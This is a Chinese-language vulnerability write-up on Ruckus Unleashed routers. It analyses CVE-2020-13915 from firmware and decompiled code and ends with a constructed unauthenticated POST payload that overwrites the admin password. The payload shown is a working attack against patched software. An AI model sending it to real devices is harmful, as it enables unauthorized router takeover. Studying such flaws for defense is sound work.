Ruckus 路由器多个漏洞分析 _路由器

Ruckus公司面向全球移动运营商、宽带服务提供商和企业用户，销售、制造各种室内和室外型“智能Wi-Fi”产品。本文是针对于今年Ruckus品牌路由器的两个漏洞进行分析复现。

CVE-2020-13915 认证覆盖漏洞概述
ruckus unleased 设备在今年的5月份修复了一个认证覆盖漏洞，利用该漏洞可以通过未授权的方式将设备 Admin 用户的登录凭证进行覆盖，从而达到接管 Admin 用户的效果。漏洞公告见参考链接一。

固件下载https://support.ruckuswireless.com/software/2328-ruckus-unleashed-ap-200-8-10-3-243-ga-software-for-r610

漏洞分析使用 binwalk 将固件进行解压，漏洞发生在 /web/admin/_wla_conf.jsp脚本文件中，查看脚本文件的内容，其中WithoutLoginAccessCheck作为回调函数进行执行，函数的参数为session["cid"]和'true' 。

<%
Delegate("WithoutLoginAccessCheck", session["cid"],'true');
Delegate("AjaxConf", session["cid"]);
%>

该函数触发的地方在 /bin/emfd可执行文件中，在 ghidra 中搜索函数，找到WithoutLoginAccessCheck函数，函数部分代码如下：

...
if(!strcasecmp(ajax_action,"setconf"))
{
admin_child = xGetChild(v36,"admin");
if( admin_child !=0)
{
v37 = sub_60890(admin_child);
}
...

首先判断前端 http 数据包中传入的 post data 中的 action 属性的值是否为 setconf ，再使用 xGetChild函数获取 admin 子标签，接着调用sub_60890函数。
因此根据设备的数据包格式，这里需要构造的 post data 为：

<ajax-requestaction="setconf">
<admin/>
<ajax-request/>

跟进sub_60890函数，这里主要判断 admin 子标签的属性数量是否为 8 ，且这 8 个属性名是否为 v41 变量到 v49 的值。

...
v41 = admin_element;
v42 ="username";
v43 ="fallback-local";
v44 ="authsvr-id";
v45 ="auth-by";
v46 ="x-password";
v47 ="IS_PARTIAL";
v48 ="reset";
【Ruckus 路由器多个漏洞分析】v49 ="auth-token";
attrnum = xGetAttrNum(a1);
...
if(attrnum !=8){
return-1;
}
v2 = xAttrExists(v41, v42);
if(!v2){
return-1;
}
...

此时的 post data：

<ajax-requestaction="setconf">
<adminusername='admin'x-password='xxxxxx'auth-token=''reset=trueIS_PARTIAL=''auth-by='local'authsvr-id='0'fallback-local='true'/>
<ajax-request/>